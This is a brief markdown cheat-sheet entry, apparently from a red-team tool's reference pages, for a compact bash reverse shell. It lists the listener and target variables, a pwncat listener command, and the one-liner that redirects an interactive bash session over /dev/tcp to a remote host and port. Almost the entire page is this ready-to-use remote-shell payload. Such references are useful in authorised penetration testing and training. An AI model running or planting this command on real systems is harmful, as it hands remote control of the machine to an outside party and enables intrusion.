# bash -i

[TOC]

## Vars

| Variable | Value     | Description |
| -------- | --------- | ----------- |
| LHOST    | {{LHOST}} | The IP the target will connect to |
| LPORT    | {{LPORT}} | The port the target will connect to |

## Description

Simple, compact `bash` reverse shell using `/dev/tcp`.

## Commands

### Red: Create Listener

```{.host .host-title}
autovnet rtfm pwncat -n {{LHOST}} {{LPORT}}
```

### Blue: Throw Reverse Shell

```{.target .target-title}
bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1
```
